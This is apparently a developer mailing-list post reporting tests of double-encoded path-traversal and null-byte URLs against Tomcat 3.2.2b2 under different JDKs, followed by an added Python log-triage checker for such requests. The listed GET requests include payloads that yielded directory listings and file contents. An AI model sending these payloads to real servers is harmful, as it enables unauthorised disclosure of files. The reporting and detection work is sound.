Here's an update. I've installed JDK1.3.0 and JDK1.3.1-beta and tested the
following URLs.
All the tests were run on Win2000 using Tomcat 3.2.2b2. The only difference
between these runs was the value of the JAVA_HOME environment variable.
The security problems I could duplicate *only* occurred when using JDK1.3.x.
They *never* happened with JDK1.2.2. I was able to duplicate problems
(directory listing and file contents) for URLs using sequences of
/%252e%252e to 'escape' from the web application directory. None of the
/%2e%2e attacks worked.
I would appreciate it if others could try these URLs on other platforms to
see if their results vary. I'm going to investigate the JDK1.3 issues on
Win2000.
GET /examples/jsp/num/numguess.jsp%00
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404

GET /%252e%252e/%252e%252e/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> Directory listing
JDK1.3.1 --> Directory listing

GET /examples/jsp/num/numguess.js%2570
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404

GET /%2e%2e/%2e%2e/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404

GET /%2e%2e/%2e%2e%5cLICENSE/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404

GET /%252e%252e/%252e%252e%5cLICENSE/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> File contents
JDK1.3.1 --> File contents
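Added example, not part of the post above: a small Python checker that percent-decodes a request path repeatedly and reports which of the tricks seen in these URLs it contains (an embedded null byte, a plain or single-encoded ".." segment, or a ".." that only appears after a second decode, which is what separates the %252e URLs that worked from the %2e ones that did not). The sample paths are the ones quoted in the post; the labels, the decode limit and the function names are my own choices, useful for triaging access logs for requests of this shape.

```python
"""Flag double-encoded traversal and null-byte tricks in raw request paths."""
import re
from urllib.parse import unquote

MAX_DECODE_PASSES = 3                 # assumed limit on repeated percent-decoding
SEGMENT_SPLIT = re.compile(r"[/\\]")  # a decoded %5c backslash also separates segments


def decode_passes(path):
    """Return [raw, decoded once, decoded twice, ...] until decoding no longer changes the string."""
    passes = [path]
    for _ in range(MAX_DECODE_PASSES):
        nxt = unquote(passes[-1])
        if nxt == passes[-1]:
            break
        passes.append(nxt)
    return passes


def classify_path(path):
    """Return a set of labels describing what repeated decoding of `path` reveals."""
    findings = set()
    passes = decode_passes(path)
    if len(passes) > 2:
        # The string still changed on the second decode, so it was (at least) double-encoded.
        findings.add("double-encoding")
    traversal_depth = None
    for depth, p in enumerate(passes):
        if "\x00" in p:
            findings.add("null-byte")
        if traversal_depth is None and ".." in SEGMENT_SPLIT.split(p):
            traversal_depth = depth
    if traversal_depth is not None:
        # depth 0/1: literal or single-encoded "..", depth >= 2: hidden behind double encoding
        findings.add("traversal" if traversal_depth < 2 else "double-encoded-traversal")
    return findings


def scan(paths):
    """Map each path to its sorted findings; paths with no findings are omitted."""
    results = {p: sorted(classify_path(p)) for p in paths}
    return {p: f for p, f in results.items() if f}


# Constructed sample: the request paths reported in the post above.
SAMPLE_PATHS = [
    "/examples/jsp/num/numguess.jsp%00",
    "/%252e%252e/%252e%252e/%00.jsp",
    "/examples/jsp/num/numguess.js%2570",
    "/%2e%2e/%2e%2e/%00.jsp",
    "/%2e%2e/%2e%2e%5cLICENSE/%00.jsp",
    "/%252e%252e/%252e%252e%5cLICENSE/%00.jsp",
]

if __name__ == "__main__":
    for path, labels in scan(SAMPLE_PATHS).items():
        print(path, "->", ", ".join(labels))
```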